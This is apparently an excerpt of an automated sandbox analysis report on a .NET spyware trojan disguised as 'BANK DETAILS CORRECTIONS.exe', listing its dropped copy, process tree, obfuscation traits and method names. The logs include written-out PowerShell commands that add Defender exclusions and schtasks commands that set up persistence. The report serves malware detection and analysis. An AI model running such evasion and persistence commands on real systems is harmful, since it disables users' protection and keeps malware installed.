                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, fe1LJPaDf5VFXiQOsV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7660000.5.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dfaee8.0.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                Source: 13.2.fcLfLlfpmjf.exe.28caec8.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/16@17/14
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | File created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe | Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe | Mutant created: \Sessions\1\BaseNamedObjects\ilxsEXzxkgHfQTaf
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | File created: C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                Source: BANK DETAILS CORRECTIONS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: BANK DETAILS CORRECTIONS.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: BANK DETAILS CORRECTIONS.exe | ReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | File read: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: unknown | Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe | Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe | Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe | Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: BANK DETAILS CORRECTIONS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BANK DETAILS CORRECTIONS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: BANK DETAILS CORRECTIONS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: firefox.pdbP source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnKifmZDGZ.exe, 00000011.00000002.3731777625.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383056576.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3731787865.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdbSHA256 source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: wntdll.pdb source: BANK DETAILS CORRECTIONS.exe, BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hBWP.pdb source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
                Source: Binary string: firefox.pdb source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdbGCTL source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: BANK DETAILS CORRECTIONS.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: fcLfLlfpmjf.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs.Net Code: uicrufJqQL System.Reflection.Assembly.Load(byte[])
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs.Net Code: uicrufJqQL System.Reflection.Assembly.Load(byte[])
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: 0x9354E9B9 [Wed Apr 29 23:26:49 2048 UTC]
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_0135F1B0 push eax; iretd 0_2_0135F1B1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_0135756A push eax; iretd 0_2_01357589
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D3932 pushad ; retf 0_2_076D3939
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0042F052 push eax; ret 12_2_0042F054
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004020F2 pushad ; retf 12_2_004020F8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00414893 push esi; ret 12_2_0041489E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004248A3 push es; ret 12_2_00424A38
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00407397 push ecx; ret 12_2_0040739A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00403600 push eax; ret 12_2_00403602
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040773B push esp; retf 12_2_00407743
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019209AD push ecx; mov dword ptr [esp], ecx12_2_019209B6
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04BC756A push eax; iretd 13_2_04BC7589
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D238F0 pushad ; iretd 13_2_04D238F1
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D23938 pushfd ; iretd 13_2_04D23939
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F83932 pushad ; retf 13_2_06F83939
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155C54D pushfd ; ret 20_2_0155C54E
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155C54F push 8B014E67h; ret 20_2_0155C554
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155C9D7 push edi; ret 20_2_0155C9D9
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015109AD push ecx; mov dword ptr [esp], ecx20_2_015109B6
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_014E135E push eax; iretd 20_2_014E1369
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_014E1FEC push eax; iretd 20_2_014E1FED
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01567E99 push ecx; ret 20_2_01567EAC
                Source: BANK DETAILS CORRECTIONS.exeStatic PE information: section name: .text entropy: 7.989685826785
                Source: fcLfLlfpmjf.exe.0.drStatic PE information: section name: .text entropy: 7.989685826785
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GG7nVgzOMgaselTNE0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cqkMh0MTH7', 'ggdMNbLgOI', 'wYkMOA74ln', 'f91M3wd2tP', 'AmKM4sZhm7', 'ofgMMii10j', 'HADMCpSTM8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, fe1LJPaDf5VFXiQOsV.csHigh entropy of concatenated method names: 'alrQFt7ZGd', 'uocQHW47Hc', 'QiSQXYcVVQ', 'qHrQi2DqjD', 'PK2Qditl6S', 'qZLQ5YdwG5', 'uTrQso3aCB', 'ACoQJrp8Rf', 'L0HQZ0Fg8x', 'fioQBRhQJo'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, NDGepILwqTm6MvrIFB.csHigh entropy of concatenated method names: 'IX2PtPq3Ss', 'pc0PQ7Edjj', 'KrTPq0c1NE', 'mAePgPaIQx', 'On6P0AkwRT', 'zvJqd7Tq0G', 'r9Xq5vRFGU', 'DMfqsFANZR', 'mGKqJCgI5J', 'hIPqZ3t3jg'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, NhDsL8vRyZnHlsuYsp.csHigh entropy of concatenated method names: 'Ar4gyBxmJZ', 'ijWgGXjE1D', 'e2rguJHEoa', 'JMlgIpn7mt', 'LIZgbt0AvZ', 'umag21NAdd', 'DXbgYCuYjY', 'Yynga54LPv', 'BPvgwmqsOk', 'RRAgR1iZdT'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, Gy0jjk5J26QyualQui.csHigh entropy of concatenated method names: 'c023JgDrXb', 'Rj23BsMrTY', 'UPq4SS5PWC', 'LZc4UGeTUP', 'Dqy3efDlmw', 'RYh3ojI0IF', 'Un63Kg1shC', 'Isr3FsTy29', 'Ury3HAxpRR', 'ceu3XuX8gr'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, lIpPJ8WMDhjobULOpe.csHigh entropy of concatenated method names: 'RHJPlKxwrO', 'GCqPy6XpsY', 'lfrPudfy3g', 'Tl3PIgWPYt', 'FRhP2N8rko', 'j9dPYH3unI', 'Q2hPwxaomK', 'KBfPRVlrLM', 'vWPjnSbhqhGc0xAMmlY', 'D6g6gEb7GGi6LLB8D4K'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, kNmsS0KwVwTBc9gu2d.csHigh entropy of concatenated method names: 'iBBha6ZBG6', 'sYshwVKNyR', 'PrnhLKeFge', 'mZEh7g34Rq', 'XgChWfy86h', 'W7WhDj4LSP', 'hOHhmgYbEf', 'PPRhk7SPQw', 'uEIh9BPucu', 'o1uheiRwue'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, Y5i6UvwKpce67ZwFXg.csHigh entropy of concatenated method names: 'fKijINmgS7', 'J8bj2wigDS', 'PJhjaZqBhA', 'uWpjwOwrrX', 'o5ujNHaZX0', 'PIMjOvlNae', 'RwWj3MPIF3', 'gnZj4D8nw1', 'trfjMXxBwb', 'UF7jCFKMT8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, zkZxIGU8FXukaMxFsYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vrNCFvDmu1', 'UwECH36clI', 'gG3CXx5ORb', 'V7fCimQbwL', 'a3TCdlVqtS', 'ay3C5hBJbZ', 'SbACsja15L'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, eY2qJaimXSGow5DTwb.csHigh entropy of concatenated method names: 'XAi3fO9gR8', 'Yhw3VXTGMO', 'ToString', 'I8G3T1fS3E', 'Djl3Qd9ust', 'QS33jR5ARB', 'c4Z3q5hNYX', 'z4G3PXxxvw', 'baQ3gybulI', 'FRu30rb9pR'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, C6DfDTZCXSi0UbmT5J.csHigh entropy of concatenated method names: 'UNg4L2axuh', 'a1847dLF7q', 'Lx546eIrQN', 'sCX4W7umGD', 'j194Fyu63b', 'Iy84D7U7Bk', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, sHDcKABKKVrFxJInf4.csHigh entropy of concatenated method names: 'HIlMUZOIph', 'fvbM8C7doV', 'WmKMrlUuQu', 'koRMT1cYQF', 'C0NMQKjhKD', 'UWLMq1RqqK', 'nXRMPyHgwU', 'Upg4sG229F', 'VX04JTfd68', 'l4J4ZCHBcN'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, OwIOThAf7ZaP1hFQg0.csHigh entropy of concatenated method names: 'gSCuHptTN', 'uRPIQfPph', 'mAv2rFl3M', 'vSAY2XJxL', 'b5Xw0gZKm', 'us5RKKQOc', 'kIjA9blJxRok7EK24L', 'VoZeSJ1hNLMEl8Lfwx', 'oq74Ue4VJ', 'LEcC3icxS'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, TAQxmwJtyBvqQpMdNN.csHigh entropy of concatenated method names: 'hCP4TJYgi5', 'Iay4Q8naDZ', 'qYb4jAQ6fl', 'O0A4q5fCGn', 'PdP4PW1QaJ', 'CvR4g9C3oI', 'McZ40ElrxB', 'mUS4cm6eZr', 'CDf4fATbwr', 'Yh04Vt0p1N'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, WIZChgQigwGrZrhkVl.csHigh entropy of concatenated method names: 'Dispose', 'KpBUZ1W8nU', 'odQA7VM81H', 'aXw449TYvv', 'MiAUBQxmwt', 'xBvUzqQpMd', 'ProcessDialogKey', 'oNYAS6DfDT', 'tXSAUi0Ubm', 'f5JAACHDcK'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.csHigh entropy of concatenated method names: 'mbl8top0Cw', 'gaB8TQESAl', 'T6N8Qvi0rX', 'r4T8jqlmEV', 'CP78qSC7kM', 'qBA8PmrOiQ', 'ile8gCpbAB', 'cbM802eaVH', 'kAL8cOY0ja', 'IjJ8fLeGDx'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, zlkrqTUSCeJO6SjsTBn.csHigh entropy of concatenated method names: 'sXGMyQM1nd', 'ClqMGtMjA2', 'b95MuetAx3', 'PyJMIUuqSi', 'mwOMbcbDFG', 'awnM26Zfrs', 'To8MYWa83J', 'AuTMaZSmZg', 'uBmMwtSUSB', 'N9HMRFgaB5'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, OectpLryIkurccAY12.csHigh entropy of concatenated method names: 'cQTUge1LJP', 'Jf5U0VFXiQ', 'MKpUfce67Z', 'EFXUVgPBSj', 'GcTUNSO9DG', 'OpIUOwqTm6', 'vjxVdY2JUkSAmoCshy', 'McOGQ73DKphXvybRTN', 'I28UUn4qqB', 'j4rU8293Ih'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, k2HUP0FNHjHWySwOx9.csHigh entropy of concatenated method names: 'SnkN98wOjd', 'TYHNossVpf', 'G1FNFnbYXq', 'hGsNH4s6Vm', 'cNrN7rHAdY', 'MCRN6NvH9s', 'JhcNWfYYfA', 'AyyND7lQJ4', 'bQCNpYZSdm', 'NpgNmq7ypl'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GG7nVgzOMgaselTNE0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cqkMh0MTH7', 'ggdMNbLgOI', 'wYkMOA74ln', 'f91M3wd2tP', 'AmKM4sZhm7', 'ofgMMii10j', 'HADMCpSTM8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, fe1LJPaDf5VFXiQOsV.csHigh entropy of concatenated method names: 'alrQFt7ZGd', 'uocQHW47Hc', 'QiSQXYcVVQ', 'qHrQi2DqjD', 'PK2Qditl6S', 'qZLQ5YdwG5', 'uTrQso3aCB', 'ACoQJrp8Rf', 'L0HQZ0Fg8x', 'fioQBRhQJo'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, NDGepILwqTm6MvrIFB.csHigh entropy of concatenated method names: 'IX2PtPq3Ss', 'pc0PQ7Edjj', 'KrTPq0c1NE', 'mAePgPaIQx', 'On6P0AkwRT', 'zvJqd7Tq0G', 'r9Xq5vRFGU', 'DMfqsFANZR', 'mGKqJCgI5J', 'hIPqZ3t3jg'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, NhDsL8vRyZnHlsuYsp.csHigh entropy of concatenated method names: 'Ar4gyBxmJZ', 'ijWgGXjE1D', 'e2rguJHEoa', 'JMlgIpn7mt', 'LIZgbt0AvZ', 'umag21NAdd', 'DXbgYCuYjY', 'Yynga54LPv', 'BPvgwmqsOk', 'RRAgR1iZdT'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, Gy0jjk5J26QyualQui.csHigh entropy of concatenated method names: 'c023JgDrXb', 'Rj23BsMrTY', 'UPq4SS5PWC', 'LZc4UGeTUP', 'Dqy3efDlmw', 'RYh3ojI0IF', 'Un63Kg1shC', 'Isr3FsTy29', 'Ury3HAxpRR', 'ceu3XuX8gr'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, lIpPJ8WMDhjobULOpe.csHigh entropy of concatenated method names: 'RHJPlKxwrO', 'GCqPy6XpsY', 'lfrPudfy3g', 'Tl3PIgWPYt', 'FRhP2N8rko', 'j9dPYH3unI', 'Q2hPwxaomK', 'KBfPRVlrLM', 'vWPjnSbhqhGc0xAMmlY', 'D6g6gEb7GGi6LLB8D4K'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, kNmsS0KwVwTBc9gu2d.csHigh entropy of concatenated method names: 'iBBha6ZBG6', 'sYshwVKNyR', 'PrnhLKeFge', 'mZEh7g34Rq', 'XgChWfy86h', 'W7WhDj4LSP', 'hOHhmgYbEf', 'PPRhk7SPQw', 'uEIh9BPucu', 'o1uheiRwue'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, Y5i6UvwKpce67ZwFXg.csHigh entropy of concatenated method names: 'fKijINmgS7', 'J8bj2wigDS', 'PJhjaZqBhA', 'uWpjwOwrrX', 'o5ujNHaZX0', 'PIMjOvlNae', 'RwWj3MPIF3', 'gnZj4D8nw1', 'trfjMXxBwb', 'UF7jCFKMT8'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, zkZxIGU8FXukaMxFsYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vrNCFvDmu1', 'UwECH36clI', 'gG3CXx5ORb', 'V7fCimQbwL', 'a3TCdlVqtS', 'ay3C5hBJbZ', 'SbACsja15L'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, eY2qJaimXSGow5DTwb.csHigh entropy of concatenated method names: 'XAi3fO9gR8', 'Yhw3VXTGMO', 'ToString', 'I8G3T1fS3E', 'Djl3Qd9ust', 'QS33jR5ARB', 'c4Z3q5hNYX', 'z4G3PXxxvw', 'baQ3gybulI', 'FRu30rb9pR'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, C6DfDTZCXSi0UbmT5J.csHigh entropy of concatenated method names: 'UNg4L2axuh', 'a1847dLF7q', 'Lx546eIrQN', 'sCX4W7umGD', 'j194Fyu63b', 'Iy84D7U7Bk', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, sHDcKABKKVrFxJInf4.csHigh entropy of concatenated method names: 'HIlMUZOIph', 'fvbM8C7doV', 'WmKMrlUuQu', 'koRMT1cYQF', 'C0NMQKjhKD', 'UWLMq1RqqK', 'nXRMPyHgwU', 'Upg4sG229F', 'VX04JTfd68', 'l4J4ZCHBcN'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, OwIOThAf7ZaP1hFQg0.csHigh entropy of concatenated method names: 'gSCuHptTN', 'uRPIQfPph', 'mAv2rFl3M', 'vSAY2XJxL', 'b5Xw0gZKm', 'us5RKKQOc', 'kIjA9blJxRok7EK24L', 'VoZeSJ1hNLMEl8Lfwx', 'oq74Ue4VJ', 'LEcC3icxS'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, TAQxmwJtyBvqQpMdNN.csHigh entropy of concatenated method names: 'hCP4TJYgi5', 'Iay4Q8naDZ', 'qYb4jAQ6fl', 'O0A4q5fCGn', 'PdP4PW1QaJ', 'CvR4g9C3oI', 'McZ40ElrxB', 'mUS4cm6eZr', 'CDf4fATbwr', 'Yh04Vt0p1N'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, WIZChgQigwGrZrhkVl.csHigh entropy of concatenated method names: 'Dispose', 'KpBUZ1W8nU', 'odQA7VM81H', 'aXw449TYvv', 'MiAUBQxmwt', 'xBvUzqQpMd', 'ProcessDialogKey', 'oNYAS6DfDT', 'tXSAUi0Ubm', 'f5JAACHDcK'
